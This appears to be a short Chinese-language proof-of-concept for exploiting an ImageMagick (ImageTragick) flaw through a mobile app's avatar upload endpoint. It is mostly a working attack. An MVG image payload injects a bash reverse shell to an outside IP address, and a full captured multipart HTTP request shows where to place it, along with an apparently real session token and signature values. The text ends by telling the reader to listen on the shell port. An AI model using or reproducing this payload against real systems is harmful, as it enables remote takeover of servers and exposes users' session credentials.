app头像上传处
传一张图抓包
把图片的内容改为
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/107.151.220.83/12345 0>&1")'
pop graphic-context
code 区域POST /rest/n/user/modify?lat=20.043384&lon=110.410347&ver=4.44&ud=234221710&sys=ANDROID_4.2.2&c=360APP&oc=360APP&net=WIFI&did=ANDROID_1072044643045168&mod=samsung%28GT-P5210%29&app=0&language=zh-cn&country_code=CN&appver=4.44.0.1323 HTTP/1.1
Accept-Language: zh-cn
User-Agent: kwai-android
Content-Type: multipart/form-data; boundary=8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK
Host: 180.186.38.200
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 1159
--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK
Content-Disposition: form-data; name="token"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
9818721fb5db40cc9d5015e8d5d0f8d0-234221710
--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK
Content-Disposition: form-data; name="os"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
android
--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
9357092294a29fb6be75ec7884fb44d6
--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK
Content-Disposition: form-data; name="client_key"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
3c2cd3f3
--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK
Content-Disposition: form-data; name="file"; filename="avatar-1462541373042.png"
Content-Type: image/png; charset=UTF-8
Content-Transfer-Encoding: binary
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/107.151.220.83/12345 0>&1")'
pop graphic-context
--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK--
发包后在服务器上监听12345端口